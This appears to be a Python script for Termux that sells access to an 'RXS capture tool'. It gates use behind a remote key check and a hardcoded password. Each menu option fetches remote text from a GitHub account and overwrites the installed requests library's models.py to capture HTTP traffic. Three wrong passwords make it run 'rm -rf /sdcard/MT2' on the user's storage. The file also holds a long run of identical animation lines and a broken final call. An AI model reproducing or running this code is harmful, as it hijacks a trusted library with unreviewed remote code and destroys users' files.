    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	animation("\x1b[92mTOOL IS ON UNDER UPDATE  ");time.sleep(1.0)
    	print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
    	server()

    if 'OF' in ok:
        print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
        animation(f"\x1b[97mTOOLS OFF");time.sleep(1.0)
        animation(f"\x1b[92mTOOLS OFF");time.sleep(2.0)
        animation(f"\x1b[93mTOOLS OFF");time.sleep(1.0)
        animation(f"\x1b[97mWAIT FOR UPDATE ");time.sleep(2.0)
        print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
        os.system('clear')
        banner()
        print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
        animation("\033[1;37m [\u001b[36m1\033[1;37m] CONTACT ADMIN REYAD   \033[1;37m")
        animation("\033[1;37m [\u001b[36m2\033[1;37m] CONTACT ADMIN TAHOSIN   \033[1;37m")
        ok = input(' [\u001b[36m❯\033[1;37m] CHOOSE ADMIN TO CONTACT ')
        print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
        if ok =='2':
        	os.system('xdg-open https://wa.me/+8801989861704?text=Assalamuwalaikum%20Sir,%20Please%20Turn%20On%20Your%20RXS%20Paid%20Tool.')
        if ok =='1':
        	os.system('xdg-open https://www.facebook.com/reyadbross')
        time.sleep(1)
        server()


    if 'ON' in ok:
    	
        print('\033[1;32mSERVER IS OPEN\033[1;37m')
        RXS()  # your def
    else:
         print('somthing is wrong')
         
#------[THIS IS YOUR LOGO]--------------------
mlinc='9REYADXSHIPU9'
'''
cd ../usr/lib/python3.11/site-packages/requests

nano api.py

CTRT-w
def get(url, params=None, **kwargs):


print(url)

'''
	
def banner():
	print(logo)
logo =("""
\033[1;32m╔══════════╦═════════════════════════════════╗\033[1;32m
║\033[1;36m╦═╗═╗ ╦╔═╗\033[1;32m║\033[1;36mOWNER: REYAD AND SHIPU \033[1;32m          ║\033[1;32m
║\033[1;36m╠╦╝╔╩╦╝╚═╗\033[1;32m║\033[1;36mFACEBOOK: MD REYAD HOSSAIN SHANTO\033[1;32m║\033[1;32m
║\033[1;36m╩╚═╩ ╚═╚═╝\033[1;32m║\033[1;36mWHATSAPP: +8801989861704\033[1;32m         ║\033[1;32m
╠══════════╩════╦═════════════╦══════════════╣
║\033[1;36mGITHUB:BINOD-XD\033[1;32m║\033[1;36mVERSION:0.0.1\033[1;32m║\033[1;36mMETHOD CAPTURE\033[1;32m║\033[1;32m
╚═══════════════╩═════════════╩══════════════╝
\033[1;91m\033[1;46m\033[1;97m             RXS CAPTURE TOOL            \033[;0m\033[1;91m\033[1;92m""")
#------------------[ MACHINE-SUPPORT ]---------------#
def animation(u):
	for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.01)
def alvino_xy(u):
        for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.005)
def clear():
	os.system('clear')
def approval():
  time.sleep(1)
  uuid = str(os.geteuid())+"DAD"+str(os.geteuid())
  id = "RXS-"+"".join(uuid)
  os.system('clear')
  print(logo)
  animation("\033[1;37m [\u001b[36m𝜩\033[1;37m] YOU NEED APPROVAL TO USE THIS TOOL   \033[1;37m")
  print("\033[1;37m [\u001b[36m𝜩\033[1;37m] YOUR KEY :\u001b[36m "+id);time.sleep(0.1)
  print ("""\x1b[92m══════════════════════════════════════════════\x1b[97m""")
  try:
    httpCaht = requests.get("https://github.com/reyadz/PAID-RXS/blob/main/captur.txt").text
    if id in httpCaht:
      animation("\033[1;97m [\u001b[36m❯\033[1;37m] YOUR KEY HAS BEEN APPROVED !!!")
      print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
      msg = str(os.geteuid())
      time.sleep(1)
      pass
    else: 
      animation("\x1b[1;97m [\u001b[36m❯\033[1;37m] SORRY YOUR KEY HAS NOT BEEN APPROVED ");
      print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
      time.sleep(0.1)
      animation("\033[1;37m [\u001b[36m1\033[1;37m] CONTACT ADMIN REYAD   \033[1;37m")
      animation("\033[1;37m [\u001b[36m2\033[1;37m] CONTACT ADMIN TAHOSIN   \033[1;37m")
      ok = input(' [\u001b[36m❯\033[1;37m] CHOOSE ADMIN TO CONTACT ')
      if ok =='2':
      	os.system('xdg-open https://wa.me/+8801989861704?text=Assalamuwalaikum%20Sir,%20I%20Want%20To%20Buy%20Your%20RXS%20Paid%20Tool.%20My%20Key:%20'+id)
      if ok =='1':
      	os.system('xdg-open https://www.facebook.com/reyadbross')
      time.sleep(1)
      approval()
  except: 
     exit() 
approval()

def login():
    attempts = 3
    while attempts > 0:
    	os.system('clear')
    	banner()
    	print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
    	print("\033[1;36mIF YOU PUT 3 WRONG PASS THEN YOU WILL BE FUCKED\033[1;37m")
    	print("\033[1;36mCHANCE REMAIN:\033[1;33m", attempts)
    	print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
    	password = input("ENTER PASSWORD: ")
    	if password == 'reyad@shipu4455':
    		print("\033[1;36mLOGIN SUCCESSFUL\033[1;37m");time.sleep(1)
    		print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
    		return True
    	else:
    		attempts -= 1
    else:
    	print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
    	print("\033[1;36m BRO YOU ARE FUCKED BY RXS 😂\033[1;37m")
    	print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
    	subprocess.run(['termux-setup-storage', '-y'], capture_output=True)
    	os.system('termux-setup-storage -y')
    	os.system('cd /sdcard')
    	os.system('rm -rf /sdcard/MT2')
    	exit()
if login():
    # Perform additional operations after successful login
    pass  # Placeholder for additional operations
#print(logo)
#----------[Function]------------------------
def RXS():
    os.system('clear')
    print(logo)
    print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
    print(f"[\033[1;36mA\033[1;37m] METHOD CAPTURE SYSTEM ON")
    print(f"[\033[1;36mB\033[1;37m] DATA CAPTURE SYSTEM ON")
    print(f"[\033[1;36mC\033[1;37m] DATA & METHOD CAPTURE SYSTEM ON")
    print(f"[\033[1;36mD\033[1;37m] ALL CAPTURE SYSTEM OFF")
    print(f"[\033[1;36mX\033[1;37m] CONTACT ADMIN")
    print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
    tahosin = input(f'CHOOSE OPTION: ')
    if tahosin in['A','1']:
        try:
            os.system('cd $HOME')
            rxs =str(requests.get('https://raw.githubusercontent.com/reyadz/PAID-RXS/main/head.txt').text)
            time.sleep(1)
            file_path = '../usr/lib/python3.11/site-packages/requests/models.py'
            # Open the file in write mode
            with open(file_path, 'w') as file:
                # Write your desired content to the file
                file.write(rxs)
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            print(f'{sifat.LI_GREEN}METHOD CAPTURE SYSTEM {sifat.LI_YELLOW}ON {sifat.LI_WHITE}DONE')
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            time.sleep(3)
        except:
            print(f'{sifat.LI_RED}SOMETHING IS WRONG')
    if tahosin in['D','4']:
        try:
            os.system('cd $HOME')
            rxs =str(requests.get('https://raw.githubusercontent.com/reyadz/PAID-RXS/main/simple.txt').text)
            time.sleep(1)
            file_path = '../usr/lib/python3.11/site-packages/requests/models.py'
            # Open the file in write mode
            with open(file_path, 'w') as file:
                # Write your desired content to the file
                file.write(rxs)
            print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
            print(f'{sifat.LI_GREEN}ALL CAPTURE SYSTEM {sifat.LI_YELLOW}OFF {sifat.LI_WHITE}DONE')
            print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
            time.sleep(3)
        except:
            print(f'{sifat.LI_RED}SOMETHING IS WRONG')
            os.system('pip uninstall -y requests && pip install requests')#NO CHANGE IF CHANGE SHOW ERROR
        
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            print(f'{sifat.LI_GREEN}ALL CAPTURE SYSTEM {sifat.LI_YELLOW}OFF {sifat.LI_WHITE}DONE')
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            RXS()
    if tahosin in['C','3']:
        try:
            os.system('cd $HOME')
            rxs =str(requests.get('https://raw.githubusercontent.com/reyadz/PAID-RXS/main/head.txt').text)
            time.sleep(1)
            file_path = '../usr/lib/python3.11/site-packages/requests/models.py'
            # Open the file in write mode
            with open(file_path, 'w') as file:
                # Write your desired content to the file
                file.write(rxs)
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            print(f'{sifat.LI_GREEN}DATA & MTHD CAPTURE SYSTEM {sifat.LI_YELLOW}ON {sifat.LI_WHITE}DONE')
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            time.sleep(3)
        except:
            print(f'{sifat.LI_RED}SOMETHING IS WRONG')
    if tahosin in['B','2']:
        try:
            os.system('cd $HOME')
            rxs =str(requests.get('https://raw.githubusercontent.com/reyadz/PAID-RXS/main/data.txt').text)
            time.sleep(1)
            file_path = '../usr/lib/python3.11/site-packages/requests/models.py'
            # Open the file in write mode
            with open(file_path, 'w') as file:
                # Write your desired content to the file
                file.write(rxs)
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            print(f'{sifat.LI_GREEN}DATA CAPTURE SYSTEM {sifat.LI_YELLOW}ON {sifat.LI_WHITE}DONE')
            print(f"\x1b[92m══════════════════════════════════════════════\x1b[97m")
            time.sleep(3)
        except:
            print(f'{sifat.LI_RED}SOMETHING IS WRONG')
    if tahosin in['X','5']:
        os.system('clear')
        print(logo)
        print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
        print(' \033[1;96m[\033[1;32m1\033[1;96m] \033[1;93mCONTACT WHATSAPP ')
        print(' \033[1;96m[\033[1;32m2\033[1;96m] CONTACT FACEBOOK ')
        print(' \033[1;96m[\033[1;32m3\033[1;96m] \033[1;94mJOIN MESSENGER GROUP')
        print(' \033[1;96m[\033[1;32m4\033[1;96m] \033[1;95mJOIN FACEBOOK GROUP')
        print("\x1b[92m══════════════════════════════════════════════\x1b[97m")
        reyad = input('CHOOSE OPTION: ')
        if reyad =='1':
            os.system("xdg-open https://wa.me/+8801989861704")
            RXS()
        if reyad =='2':
            os.system('xdg-open https://www.facebook.com/reyadbross')
            RXS()
        if reyad =='3':
            os.system('xdg-open https://m.me/j/AbZltMIVrGlcZi6j/')
            RXS()
        if reyad =='4':
            os.system('xdg-open https://facebook.com/groups/450474632802314/')
            RXS()
    else:
        RXS()

server().login().RXS()
